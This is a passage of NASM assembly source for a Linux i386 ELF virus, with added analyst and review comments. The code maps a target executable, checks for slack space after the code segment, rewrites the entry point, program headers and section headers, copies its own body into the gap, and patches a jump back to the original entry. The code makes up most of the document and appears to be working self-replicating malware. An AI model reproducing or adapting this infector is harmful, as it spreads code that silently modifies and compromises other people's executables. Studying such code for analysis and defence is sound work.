	push string5 ;;;debug
	call printf
	add esp,8    ;;;
    %endif

;;map the file into memory [void* mmap(start,length,prot,flags,fd,offset)]
;;  					in file <asm/mman.h>
;;the arguments stay in a struct that I create in the stack
;; mmap_arg_struct in file <usr/src/linux/arch/i386/kernel/sys_i386.c>
;;
;; Analyst note: this is the i386 "old_mmap" entry (eax=90), which takes ONE
;; argument: ebx -> a 6-dword mmap_arg_struct, built here on the stack.
;; In:   [esp+STACK2-8] = file length, [esp+STACK2-4] = fd (both set before this view)
;; Out:  [esp+STACK2-12] = address of the mapping; on failure control goes to mmap_error
;; Clobbers: eax, ebx, ecx, edx
mmap:
	mov eax,90
	mov ecx,[esp+STACK2-8] ;filelength 
	mov edx,[esp+STACK2-4] ;fd 
	sub esp,24        ;alloc size of struct mmap_arg_struct
	mov dword [esp],0 ;start
	mov [esp+4],ecx   ;len
	mov dword [esp+8],3  ;prot READ-WRITE
	mov dword [esp+12],2 ;flag MAP_PRIVATE (private mapping: the header patches made below are not written back by the kernel; write: copies the image out explicitly)
	mov [esp+16],edx     ;fd
	mov dword [esp+20],0 ;offset
	mov ebx,esp 
	int 0x80  ;;mmap system call(eax=90,ebx=ptr to mmap_arg_struct)
	add esp,24
	cmp eax,-1  ;NOTE(review): only -1 counts as failure; a raw int 0x80 returns -errno (any value in [-4095,-1]), so other errors fall through as if eax were a valid pointer
	jne c_mmap
	jmp mmap_error
    c_mmap:
	mov [esp+STACK2-12],eax    ;;;;;;;;;;;;;;[esp+STACK2-12]=pointer to mapped file
    %ifdef DEBUG
    	push eax  ;;;debug
	push string6 
	call printf
	add esp,8
    %endif
;end mmap

;;is suitable(if ELF and there is space for virus in memory)
;; Analyst note: three gates; any failure jumps to suit_error (munmap + close + exit):
;;   1. the first dword of the mapping must be 0x7f 'E' 'L' 'F'
;;   2. the file length must be >= 0x130 (signed compare)
;;   3. the gap between ph[2] (assumed to be the .text PT_LOAD) and ph[3] must be
;;      >= VIRUS_SIZE, and e_phnum must be >= 5 - note the count is checked only
;;      AFTER ph[2]/ph[3] have already been dereferenced
;; Stack slots written here (relative to esp): -16 e_entry, -20 e_phoff, -24 e_shoff,
;;   -28 e_phnum, -32 e_shnum, -36 ph[2].p_filesz (reused later as the insertion offset)
;; Clobbers: eax, ebx, ecx, edx, esi
is_suitable:
	;scas (scan strings ELF) or repe
	;but I coompare only the first 4 bytes ( a dword),so:
	mov edx,[esp+STACK2-12] ;ptr mapped
	mov ebx,[edx]    ;.ELF
	mov eax,0x464c457f  ;45=E,4c=L,46=F  (little-endian "\x7fELF")
    %ifdef DEBUG
    	push eax
    	push ebx
    	push string12
    	call printf
    	add esp,4   ;drop only the format string; the pops below restore ebx/eax
    	pop ebx
    	pop eax
    %endif
	cmp ebx,eax
	je c1_is_suitable
   error_suitable:
	jmp suit_error
   c1_is_suitable:
	;now read the ehdr (I need these informations first), but 
;TODO: I don't want e_phoff or e_shoff > filesz and entry out off range 
;NOTE(review): the TODO above is never done - e_phoff/e_shoff are used as-is to
;index the mapping below, so a crafted header makes this read outside the map
   read_ehdr:
	mov ebx,[esp+STACK2-8]  ;file len
	cmp ebx,0x130 
	jl error_suitable   ;error file size too small (signed compare)
   c_ehdr:
	mov esi,[esp+STACK2-12]  ;ptr mapped
	mov eax,[esi+0x18]        ;Elf32_Ehdr.e_entry
	mov [esp+STACK2-16],eax   ;;;;;;;;;;;;;;;;[esp+STACK2-16]=e_entry
	mov eax,[esi+0x1c]        ;Elf32_Ehdr.e_phoff
	mov [esp+STACK2-20],eax   ;;;;;;;;;;;;;;;;[esp+STACK2-20]=e_phoff
	mov eax,[esi+0x20]        ;Elf32_Ehdr.e_shoff
	mov [esp+STACK2-24],eax   ;;;;;;;;;;;;;;;;[esp+STACK2-24]=e_shoff
	mov eax,dword [esi+0x2c]    ;Elf32_Ehdr.e_phnum is a 16-bit field: a dword is loaded and masked
	;else save only word, but after don't pop eax 
	and eax,0xffff ;only 2 bytes
	mov [esp+STACK2-28], eax   ;;;;;;;;;;;;;;;;[esp+STACK2-28]=e_phnum
	mov eax,dword [esi+0x30]    ;Elf32_Ehdr.e_shnum (16-bit, same treatment)
	and eax,0xffff
	mov [esp+STACK2-32],eax    ;;;;;;;;;;;;;;;;[esp+STACK2-32]=e_shnum
	
    %ifdef DEBUG
	push dword [esp+STACK2-16] 
	push string3
	call printf
	add esp,8  
	
	push dword [esp+STACK2-20] 
	push string3
	call printf
	add esp,8  
	
	push dword [esp+STACK2-24] 
	push string3
	call printf
	add esp,8  

	push dword [esp+STACK2-28] 
	push string3
	call printf
	add esp,8  
	
	push dword [esp+STACK2-32] 
	push string3
	call printf
	add esp,8  
    %endif
    ;end read_ehdr

    is_suitable_space:
	;look if there is space between end of section 2 and begin of 3
	;(Elf32_Phdr is 32 bytes: +4 p_offset, +8 p_vaddr, +16 p_filesz, +20 p_memsz)
	mov esi,[esp+STACK2-12] ;ptr to mapped
	mov ebx,[esp+STACK2-20] ;e_phoff (unvalidated, see TODO above)
	add esi,ebx      ;ph[0]
	mov ecx,[esi+32*3+8]  ;ph[3].p_vaddr
	mov ebx,[esi+32*2+16] ;ph[2].p_filesz 
	mov [esp+STACK2-36],ebx    ;;;;;;;;;;;;;;;;[esp+STACK2-36]=ph[2].p_filesz
	add ebx,[esi+32*2+8]  ;ph[2].p_vaddr  
	sub ecx,ebx      ;ph[3].p_vaddr-ph[2].p_vaddr-ph[2].p_filesz
	;verify ecx > VIRUS_SIZE
	;(the gap is measured in virtual addresses, yet ph[2].p_filesz is later used as a
	; FILE offset as well - this presumes ph[2].p_offset == 0; TODO confirm)
	mov eax,VIRUS_SIZE
	cmp ecx,eax
	jl error_suitable ;exit    ;;there is not space to write virus (signed compare)
    %ifdef DEBUG
	push ecx
	push string10
	call printf
	add esp,8
    %endif
	;---------here I look it I have more than 3 ph, else file is not
	;_________compiled with gcc, but for example with ld (and I assume 
	;_________ph[2] is the text section
	;NOTE(review): this count check runs after ph[2]/ph[3] were already read above
	mov ebx,[esp+STACK2-28]   ;e_phnum
	cmp ebx,5
	jl error_suitable
    ;end is_suitable_space
;end is_suitable

patch_ehdr:
;; Rewrite two Elf32_Ehdr fields in the (private) mapping:
;;   e_entry (+0x18) <- 0x08048000 + ph[2].p_filesz, i.e. execution will start right
;;                      where the .text segment's file bytes end. 0x08048000 is a
;;                      hard-coded load base (non-PIE i386 assumption - TODO confirm)
;;   e_shoff (+0x20) += VIRUS_SIZE, unconditionally (presumes the section header
;;                      table lies after the insertion point)
;; e_phoff is left untouched. Clobbers: ebx, esi (esi = mapping base on exit)
    patch_e_entry:
 	   ;the new e_entry will be where the code section finish
	mov ebx,0x08048000
	add ebx,[esp+STACK2-36]    ;ebx<-new entry
	mov esi,[esp+STACK2-12]    ;ptr mapped
	mov [esi+0x18],ebx  ;fix entry
    ;end patch_e_entry

    patch_e_sh_offset:
	add dword [esi+32],VIRUS_SIZE  ;e_shoff is at +0x20
    ;end patch_e_sh_offset

patch_phdrs:
;; Walk all e_phnum program headers (32 bytes each) in the mapping and adjust
;; them around the insertion point:
;;   - a phdr with p_offset == 0 is taken to be the .text PT_LOAD: its p_filesz
;;     and p_memsz grow by VIRUS_SIZE (matched on p_offset only, not on p_type)
;;   - every phdr with p_offset >= insertion_offset gets p_offset += VIRUS_SIZE
;; Loop counter is ecx = e_phnum driven by `loop`; e_phnum >= 5 was enforced in
;; is_suitable, so the counter cannot start at 0. Comparisons are signed (jg).
;; Clobbers: eax, ecx, edx, esi
    %ifdef DEBUG
	push dword [esp+STACK2-36] ;;debug
	push string1
	call printf ;;debug
	add esp,8
    %endif
	mov ecx,[esp+STACK2-28] ;e_phnum
	mov edx,[esp+STACK2-20] ;e_phoff
	mov esi,[esp+STACK2-12] ;ptr to mapped
	add esi,edx      ;ph[0]
	mov eax,[esp+STACK2-36] ;insertion_offset

    l_read_ph:
    	cmp dword [esi+4],0    ;.text ph (p_offset == 0)
    	jne dont_patch_phtext
	;here patch .text ph 
	add dword [esi+16],VIRUS_SIZE ;patch p_filesz
	add dword [esi+20],VIRUS_SIZE ;patch p_memsz
    dont_patch_phtext:
	cmp eax,[esi+4]  ;if offset <= insertion_offset patch ->jg dont...
	jg dont_patch_ph  ;skip when insertion_offset > p_offset
	;here patch phs at offset >= insertion_offset
	add dword [esi+4],VIRUS_SIZE ;patch p_offset
    dont_patch_ph:
    %ifdef DEBUG
    	push eax
    	push ecx
    	
    	push string7
    	call printf
    	add esp,4   ;drop the format only; eax/ecx are restored by the pops below (esi survives the cdecl calls)

	push dword [esi+4]
	push string11 ;p_offset
	call printf
	add esp,8
	
	push dword [esi+16]
	push string9 ;p_filesz
	call printf
	add esp,8
    	
	push dword [esi+20]
	push string13 ;p_memsz
	call printf
	add esp,8
	
    	pop ecx
    	pop eax
    %endif
    	add esi,0x20 ;next ph
	loop l_read_ph
;end patch_phdrs


patch_shdrs:
;; Walk all e_shnum section headers (40 bytes each: +16 sh_offset, +20 sh_size):
;;   - the section with sh_offset+sh_size == insertion_offset (the one ending exactly
;;     at the insertion point, presumably .text) gets sh_size += VIRUS_SIZE
;;   - every section with sh_offset >= insertion_offset gets sh_offset += VIRUS_SIZE
;; NOTE(review): e_shnum is never validated; `loop` with ecx == 0 iterates 2^32 times,
;; and is_suitable does not reject a file without a section header table.
;; Comparison is signed (jl). Clobbers: eax, ebx, ecx, edx, esi
	mov ecx,[esp+STACK2-32] ;e_shnum (loop counter)
	mov edx,[esp+STACK2-24] ;e_shoff (unvalidated against the file size)
	mov esi,[esp+STACK2-12] ;ptr mapped
	add esi,edx      ;sh[0]
	mov eax,[esp+STACK2-36] ;insertion_offset
    l_read_sh:
	mov ebx,[esi+16]  ;sh_offset ;;;;;;;;;;;;patch .text
	add ebx,[esi+20]  ;sh_size
	cmp ebx,eax       ;sh.sh_offset+sh.sh_size == insertion_offset ?
	jne dont_patch_shtext 
	;patch .text
	add dword [esi+20],VIRUS_SIZE  ;patch sh_size
    dont_patch_shtext:
    	cmp [esi+16],eax  ;sh_offset < insertion_offset -> don't patch 
    	jl dont_patch_sh
    	;patch sh
	add dword [esi+16],VIRUS_SIZE  ;patch sh_offset
    dont_patch_sh:
    
    %ifdef DEBUG
    	push eax
    	push ecx
    	
    	push string7
    	call printf
    	add esp,4   ;drop the format only; eax/ecx are restored by the pops below

	push dword [esi+16]
	push string15 ;sh_offset
	call printf
	add esp,8
	
	push dword [esi+20]
	push string16 ;sh_size
	call printf
	add esp,8
    	
    	pop ecx
    	pop eax
    %endif
	add esi,40  ;next sh 
	loop l_read_sh 
;end patch_shdrs

find_current_entry_point: ;so I'll copy this code into the infected
;; esi <- e_entry of the RUNNING image, read from the absolute address 0x08048018
;; (= 0x08048000 + 0x18): the host process's own ELF header is assumed to be mapped at
;; the fixed non-PIE i386 base. write: later copies VIRUS_SIZE bytes starting at esi,
;; so this is the source address of the body that gets planted in the target.
	mov esi,dword [0x08048018] ;current entry
     %ifdef DEBUG
        push esi
        push string17
        call printf
        add esp,8
     %endif
;end find_current_entry_point

write:
;; Rebuild the target file on disk from the patched private mapping, reusing the fd the
;; file was opened with (the open itself is before this view; the commented-out open
;; below shows the original intent). Raw syscalls, in order:
;;   write(fd, map, insertion_offset)                       - patched headers + bytes before the gap
;;   write(fd, esi, VIRUS_SIZE)                             - the body, copied from the running image
;;   lseek(fd, insertion_offset+VIRUS_SIZE, SEEK_SET)       - resync in case that write was short
;;   write(fd, map+insertion_offset, filelen-insertion_offset) - the remainder of the original
;;   lseek(fd, insertion_offset+0xb7, SEEK_SET); write(fd, &rel32, 4) - retarget the body's final jmp
;; NOTE(review): no write/lseek return value is checked, and ebx is relied on to still
;; hold fd across each int 0x80 (the kernel only writes eax). The first write presumes
;; the fd's file position is 0 - TODO confirm from the open call.
;; 0xb7 is a hard-coded file offset of the jmp's rel32 operand inside the body; the
;; displacement is computed relative to the operand's end at vaddr 0x08048000+insertion_offset+0xb7+4.
;; Requires: esi = body address (find_current_entry_point). Clobbers: eax, ebx, ecx, edx
	;open the file for writing
	;mov eax,5
	;mov ebx,[esp+STACK2-44] ;filename infected
	;mov ecx,101q ;write-create-truncate
	;mov edx,555q ;read-execute from all
	;int 0x80
	mov eax,[esp+STACK2-4] ;<---old fd
	mov [esp+STACK2-40],eax    ;;;;;;;;;;;;[esp+STACK2-40]=write fd
	;write before insertion
	mov ebx,eax ;fd
	mov eax,4   ;SYS_write
	mov ecx,[esp+STACK2-12] ;mapped
	mov edx,[esp+STACK2-36] ;insertion_offset 
	int 0x80  ;;write first before insertion_offset (return value not checked)
	;write virus
	mov eax,4
	mov ecx,esi         ;entry point address
	mov edx,VIRUS_SIZE  ;virus length 
	int 0x80  ;;write the virus at insertion_offset (return value not checked)
	;perhaps I have written less then VIRUS_SIZE bytes, so I have to
	;seek the fd of VIRUS_SIZE more then the insertion_offset
	mov eax,19  ;SYS_lseek
	mov ecx,[esp+STACK2-36] ;insertion_offset
	add ecx,VIRUS_SIZE
	mov edx,0  ;SEEK_SET
	int 0x80   ;SYS lseek
	;write after insertion (assume ebx=fd)
	mov ecx,[esp+STACK2-36] ;insertion_offset
	mov edx,[esp+STACK2-8]  ;total file length
	sub edx,ecx ;remaining length to write
	mov eax,4
	add ecx,[esp+STACK2-12] ;mapped
	int 0x80  ;;write at end after insertion_offset
	
;fix jmp to old entry point (instead of exit) and jmp offsets
	;seek the fd at insertion_offset+0xb7, 
	;where I'll put a jump to old entry point
	mov eax,19
	mov ecx,[esp+STACK2-36] ;insertion_offset
	add ecx,0xb7  ;it is the *jmp ahah* eheh  (hard-coded operand offset, changes if the body is reassembled)
	mov edx,0  ;SEEK_SET
	int 0x80   ;SYS lseek
   %ifdef DEBUG 
   	push ebx
   	push ecx
   	push string20
   	call printf
   	add esp,4
   	pop ecx
   	pop ebx
   %endif
	;write the address to jmp  (assume ebx=fd)
	add ecx,0x08048004  ;address where instruction finish  (0x08048000 base + 4-byte rel32 operand)
	mov edx,[esp+STACK2-16] ;old_entry
	sub edx,ecx             ;rel32 = old_entry - end_of_jmp
	push edx     ;the opaddress part
	mov ecx,esp  ;write the 4 bytes straight from the stack
	mov edx,4
	mov eax,4
	int 0x80   ;SYS write
	add esp,4
;end fix
;end write

suit_error:
;; Cleanup/exit ladder. The success path falls straight through all three steps;
;; each error label enters at the level matching what had been set up:
;;   suit_error -> munmap + close + exit   (mapping exists: unsuitable file, or done)
;;   mmap_error -> close + exit            (fd open, mapping failed)
;;   open_error -> exit only
;; __exit releases the STACK2-byte frame allocated at the start of main (before this
;; view) and returns to main's caller. No syscall return value is checked here.
munmap:
	mov eax,91   ;SYS_munmap
	mov ebx,[esp+STACK2-12] ;ptr to map
	mov ecx,[esp+STACK2-8]  ;map length
	int 0x80

;;close the file
mmap_error:
close:
	mov eax,6    ;SYS_close
	mov ebx,[esp+STACK2-4]  ;fd
	int 0x80      ;close

;;exit
open_error:
__exit: 
	add esp,STACK2  ;restore the stack allocated at the beginning
	ret
	
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;end main;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;data in section text;;;;;;;;;;;;;;;;;;;;;;;;;;
;; DEBUG-only printf format strings plus a small table of Elf32_Ehdr field offsets.
;; They are placed in .text rather than .rodata, presumably so that they stay inside
;; the contiguous VIRUS_SIZE bytes copied from the entry point in write:.
;; `infected` and `off_table` are not referenced by any code visible in this view.
%ifdef DEBUG
string1: db 'fd=%d',10,0 
string2: db 10,0
string3: db '0x%X',10,0
string4: db 'at offset 0x%X there is: ',0
string5: db 'file size=%dbytes',10,0
string6: db 'mmap ptr=0x%X',10,0
string7: db 'ecx=%d',10,0
string8: db 'ebp = 0x%X',10,0
string9: db 'filesz = 0x%X',10,0
string10: db 'free space for insertion = 0x%X',10,0
string11: db 'offset = 0x%X',10,0
string12: db 'signatureELF = 0x%X',10,0
string13: db 'p_memsz = 0x%X',10,0
string14: db '--------------------',10,0
string15: db 'sh_offset = 0x%X',10,0
string16: db 'sh_size = 0x%X',10,0
string17: db 'entry = 0x%X',10,0
string20: db 'seekKKKk to 0x%X',10,0
infected: db 'infected',0
off_table:    ;table with the file offsets where I want to look 
	dd 0x18 ;entry point (e_entry)
	dd 0x1c ;program header offset (e_phoff)
	dd 0x20 ;section header offset (e_shoff)
	dd 0x2c ;number of phs (e_phnum) (only 2 bytes!!!)
	dd 0x30 ;number of shs (e_shnum) (only 2 bytes!!!)
	dd 0    ;end of table
%endif
	;I leave a few words here: a greeting string in .data, not referenced by the visible code
section .data
db 'hello, nice boys, I hope you will enjoy this program written with nasm.I want to say thanks to all my programmers friend.Bye from Gildo.',0

